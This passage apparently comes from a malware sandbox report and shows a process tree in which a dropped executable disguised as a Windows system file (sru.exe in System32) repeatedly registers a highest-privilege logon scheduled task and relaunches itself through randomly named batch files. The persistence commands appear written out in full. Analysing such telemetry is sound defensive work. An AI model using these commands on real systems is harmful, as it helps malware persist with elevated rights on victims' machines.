        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        41⤵
        
        PID:1052
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        42⤵
        
        PID:2864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BOTLuJivrMiR.bat" "
        41⤵
        
        PID:1600
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        42⤵
        
        PID:2300
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        42⤵
        
        PID:4216
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        42⤵
        Runs ping.exe
        
        PID:2232
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        42⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:224
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        43⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1840
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        44⤵
        
        PID:1976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fLgizBHy5F95.bat" "
        43⤵
        
        PID:328
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        44⤵
        
        PID:3112
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        44⤵
        
        PID:2908
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        44⤵
        Runs ping.exe
        
        PID:4768
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        44⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2160
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        45⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1744
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        46⤵
        
        PID:1588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zRaqXqADNHPd.bat" "
        45⤵
        
        PID:3968
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        46⤵
        
        PID:1620
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        46⤵
        
        PID:3012
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        46⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2260
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        46⤵
        
        PID:3012
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        47⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2876
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        48⤵
        
        PID:3172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YlmumB0RYrd9.bat" "
        47⤵
        
        PID:796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        48⤵
        
        PID:3084
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        48⤵
        
        PID:4364
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        48⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:992
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        48⤵
        Drops file in System32 directory
        
        PID:924
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        49⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4828
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mb0Vq0ojglPG.bat" "
        49⤵
        
        PID:3780
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        50⤵
        
        PID:4072
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        50⤵
        
        PID:3616
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        50⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2100
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        50⤵
        
        PID:3176
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        51⤵
        
        PID:772
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        52⤵
        
        PID:1452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QvlWz47UUJ92.bat" "
        51⤵
        
        PID:3004
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        52⤵
        
        PID:2920
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        52⤵
        
        PID:952
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        52⤵
        
        PID:1484
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        52⤵
        
        PID:1972
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        53⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2420
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        54⤵
        
        PID:2752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Q6zWdIU0knaH.bat" "
        53⤵
        
        PID:4356
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        54⤵
        
        PID:4804
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        54⤵
        
        PID:1864
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        54⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2216
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        54⤵
        Drops file in System32 directory
        
        PID:3012
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        55⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2920
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        56⤵
        
        PID:1668
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uGoXW9HESwfY.bat" "
        55⤵
        
        PID:1512
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        56⤵
        
        PID:2368
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        56⤵
        
        PID:2660
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        56⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:764
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        56⤵
        Drops file in System32 directory
        
        PID:1824
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        57⤵
        
        PID:772
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        58⤵
        
        PID:3156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JxXn6UuET7rM.bat" "
        57⤵
        
        PID:4020
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        58⤵
        
        PID:4728
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        58⤵
        
        PID:3904
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        58⤵
        
        PID:1548
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        58⤵
        Drops file in System32 directory
        
        PID:2096
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        59⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:764
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        60⤵
        
        PID:1048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\smdMTCmD4hyl.bat" "
        59⤵
        
        PID:3264
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        60⤵
        
        PID:4712
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        60⤵
        
        PID:332
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        60⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4452
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        60⤵
        Drops file in System32 directory
        
        PID:2420
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        61⤵
        
        PID:1012
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        62⤵
        
        PID:4628
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WaiCDLuE7756.bat" "
        61⤵
        
        PID:2052
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        62⤵
        
        PID:456
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        62⤵
        
        PID:1836
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        62⤵
        
        PID:3044
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        62⤵
        Drops file in System32 directory
        
        PID:2664
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        63⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3928
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        64⤵
        
        PID:2956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yy9Uao7bARcz.bat" "
        63⤵
        
        PID:548
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        64⤵
        
        PID:2144
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        64⤵
        
        PID:952
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        64⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4200
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        64⤵
        
        PID:2908
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        65⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2216
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        66⤵
        
        PID:3448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XJohN635Fe1J.bat" "
        65⤵
        
        PID:3136
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        66⤵
        
        PID:1004
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        66⤵
        
        PID:788
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        66⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3700
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        66⤵
        Drops file in System32 directory
        
        PID:1560
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        67⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1656
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        68⤵
        
        PID:2584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5izXRKC0a10Z.bat" "
        67⤵
        
        PID:3496
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        68⤵
        
        PID:3968
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        68⤵
        
        PID:1860
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        68⤵
        Runs ping.exe
        
        PID:3176
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        68⤵
        Drops file in System32 directory
        
        PID:4712
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        69⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1360
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        70⤵
        
        PID:3500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gt8crgzVaO40.bat" "
        69⤵
        
        PID:1584
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        70⤵
        
        PID:1464
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        70⤵
        
        PID:3960
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        70⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2772
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        70⤵
        
        PID:236
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        71⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DwtwHrlg1Mme.bat" "
        71⤵
        
        PID:4180
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        72⤵
        
        PID:1088
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        72⤵
        
        PID:856
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        72⤵
        Runs ping.exe
        
        PID:4216
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        72⤵
        
        PID:2120
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        73⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3GNznQZjJDpW.bat" "
        73⤵
        
        PID:3768
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        74⤵
        
        PID:4628
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        74⤵
        
        PID:3052
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        74⤵
        
        PID:1324
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        74⤵
        Drops file in System32 directory
        
        PID:4764
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        75⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2152
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        76⤵
        
        PID:3596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ftd9H6hEbYK.bat" "
        75⤵
        
        PID:1088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        76⤵
        
        PID:2172
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        76⤵
        
        PID:4672
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        76⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4020
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        76⤵
        
        PID:1368
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        77⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GCKk0Gu7ugYA.bat" "
        77⤵
        
        PID:2884
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        78⤵
        
        PID:2572
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        78⤵
        
        PID:3320
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        78⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4332
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        78⤵
        
        PID:1836
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        79⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3984
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        80⤵
        
        PID:2660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\P4iS3ldYkgRD.bat" "
        79⤵
        
        PID:2504
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        80⤵
        
        PID:2632
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        80⤵
        
        PID:3132
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        80⤵
        Runs ping.exe
        
        PID:2936
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        80⤵
        
        PID:4628
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        81⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4204
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        82⤵
        
        PID:2804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FGNuafOygyn0.bat" "
        81⤵
        
        PID:3216
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        82⤵
        
        PID:1912
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        82⤵
        
        PID:3428
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        82⤵
        Runs ping.exe
        
        PID:3448
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        82⤵
        Drops file in System32 directory
        
        PID:796
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        83⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2008
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        84⤵
        
        PID:4840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\a6nnoTyAsMej.bat" "
        83⤵
        
        PID:2552
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        84⤵
        
        PID:3784
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        84⤵
        
        PID:2632
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        84⤵
        
        PID:3500
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        84⤵
        Drops file in System32 directory
        
        PID:4452
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        85⤵
        
        PID:4084
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        86⤵
        
        PID:4576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CgsKcNVXGMyn.bat" "
        85⤵
        
        PID:332
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        86⤵
        
        PID:2932
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        86⤵
        
        PID:2856
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        86⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3528
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        86⤵
        Drops file in System32 directory
        
        PID:852
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        87⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1908
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        88⤵
        
        PID:480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lgPTOpG51fVc.bat" "
        87⤵
        
        PID:4852
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        88⤵
        
        PID:2752
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        88⤵
        
        PID:4020
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        88⤵
        
        PID:2868
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        88⤵
        
        PID:4664
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        89⤵
        
        PID:2920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LaVHuN9R0e9z.bat" "
        89⤵
        
        PID:1912
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        90⤵
        
        PID:2184
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        90⤵
        
        PID:4784
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        90⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4808
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        90⤵
        Drops file in System32 directory
        
        PID:852
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        91⤵
        
        PID:5084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fRQB6YZZu1Ww.bat" "
        91⤵
        
        PID:3112
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        92⤵
        
        PID:3412
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        92⤵
        
        PID:3500
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        92⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:952
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        92⤵
        Drops file in System32 directory
        
        PID:4888
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        93⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5064
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        94⤵
        
        PID:2932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lEjl22QkwawU.bat" "
        93⤵
        
        PID:3968
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        94⤵
        
        PID:2092
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        94⤵
        
        PID:3536
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        94⤵
        
        PID:5088
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        94⤵
        
        PID:2160
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        95⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\V5vWPzOP5MpU.bat" "
        95⤵
        
        PID:3044
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        96⤵
        
        PID:3088
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        96⤵
        
        PID:3004
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        96⤵
        Runs ping.exe
        
        PID:3384
        
        C:\Windows\system32\sru\sru.exe
        
        "C:\Windows\system32\sru\sru.exe"
        96⤵
        
        PID:2796
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "xml" /sc ONLOGON /tr "C:\Windows\system32\sru\sru.exe" /rl HIGHEST /f
        97⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5048
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        98⤵
        
        PID:1360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MohFfDN3xEHs.bat" "
        97⤵
        
        PID:2172
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        98⤵
        
        PID:1560
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        98⤵
        
        PID:3932
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        98⤵
        
        PID:3924
        
        C:\Windows\system32\sru\sru.exe
        
